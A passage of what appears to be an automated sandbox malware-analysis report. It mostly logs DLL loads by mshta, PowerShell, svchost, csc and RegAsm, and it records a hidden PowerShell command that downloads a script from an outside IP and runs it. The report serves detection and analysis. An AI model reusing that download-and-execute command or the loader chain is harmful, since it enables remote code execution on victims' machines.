              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.pdbx source: powershell.exe, 00000001.00000002.1781632412.0000000005BFD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1779801283.0000000003128000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.pdb source: powershell.exe, 00000001.00000002.1781632412.0000000005651000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000001.00000002.1793256406.00000000084AC000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00446061 push edx; retf 7_2_00446062
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh7_2_0043CA63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00445A2E push esi; ret 7_2_00445A31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00442543 push esp; retf 7_2_00442549
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00439F70 push eax; mov dword ptr [esp], 60616263h7_2_00439F7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dllJump to dropped file
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
